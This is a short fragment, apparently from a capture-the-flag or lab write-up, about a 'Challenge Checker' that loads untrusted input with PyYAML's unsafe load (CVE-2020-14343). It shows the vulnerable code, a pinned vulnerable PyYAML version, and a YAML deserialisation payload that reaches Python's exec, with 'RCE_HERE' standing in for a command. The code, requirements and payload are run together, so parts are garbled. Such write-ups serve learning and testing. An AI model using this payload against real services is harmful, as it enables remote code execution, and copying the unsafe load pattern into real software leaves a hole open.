Challenge Checker
PyYAML deserialisation vulnerability (CVE-2020-14343).
Challenge Checker 1
from yaml import load
...
def check(raw_data) -> "Tuple[list[str], list[str]]":
data = load(raw_data)PyYAML==3.13
termcolor==1.1.0- !!python/object/new:str
args: []
state: !!python/tuple
- "RCE_HERE"
- !!python/object/new:staticmethod
args: [0]
state:
update: !!python/name:exec
Challenge Checker 2

Last updated